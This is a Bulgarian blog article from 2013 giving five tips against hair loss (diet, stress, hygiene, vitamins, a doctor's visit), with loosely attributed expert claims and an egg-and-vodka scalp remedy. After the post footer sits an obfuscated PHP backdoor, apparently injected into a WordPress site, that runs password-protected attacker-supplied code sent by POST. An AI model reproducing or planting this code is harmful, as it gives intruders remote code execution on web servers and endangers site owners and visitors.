5 неща за превенция на косопад преди да е станало твърде късно | Косопад

5 неща за превенция на косопад преди да е станало твърде късно

диета при косопадНормално е на ден да се губят по около 100 косъма, но ако се притеснявате от евентуален косопад има няколко неща, които могат да ви помогнат да го предотвратите.

Променете вашата диета

„Ти си това, което ядеш” се отнася за съвкупността от душевно и телесно здраве, включително състоянието на косата. Симптоми на косопад могат да бъдат развити вследствие на неправилна диета, независимо дали става въпрос за дефицит или излишък на хранителни вещества. За да работят правилно, космените фоликули се нуждаят от балансирана диета с протеин, сложни въглехидрати, витамини и минерали. Да се избягва екстремна загуба или рязко покачване на тегло.

Успокойте се

Повишените нива на стрес също могат да доведат до поява на косопад, така че е важно да се вземат превантивни мерки срещу подобно състояние на психиката. Въпросът как да отпуснете съзнанието си наистина е труден. Добри методи са тренировката, общуването с природата, слушането на хубава музика и много други. Сами намерете начините, които помагат да борите стреса.

Хигиена

Не забравяйте да поддържате личната си хигиена на отлично ниво. Лекари разкриват, че мръсната коса е в пъти по – податлива на заболявания, които се обострят изключително много.

„Когато не поддържате скалпа в добро състояние, лесно може да се стигне до различни форми на косопад. Натрупаната мазнина и прахът не позволяват на клетките да дишат, а тези части на човешкото тяло са като всички останали живи организми – нуждаят се от въздух и храна, за да живеят”, казват специалисти.

Ако дълго време не сте обръщали достатъчно внимание, добре е да използвате домашни рецепти за подхранване на косъма. В подобна ситуация особено подходяща е смес от две яйца и малко водка, която се нанася директно в корените и се масажира около 10 минути.

За витамините

Купете си витамини, за да попълните нуждите на тялото. Косата се нуждае от определени полезни вещества, за да расте здрава и лъскава. Добавете калций, желязо, цинк, витамини D, В6 и В12 към диетата и не след дълго ще забележите положителната промяна.

Посещение при специалист

Ако родителите ви страдат от косопад, добре е да отидете на лекар. Простият кръвен тест може да каже много за състоянието ви и да позволи вземането на адекватни мерки.

30. септември 2013 12:02:31 от Косопад
Категории: Косопад – Статии | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}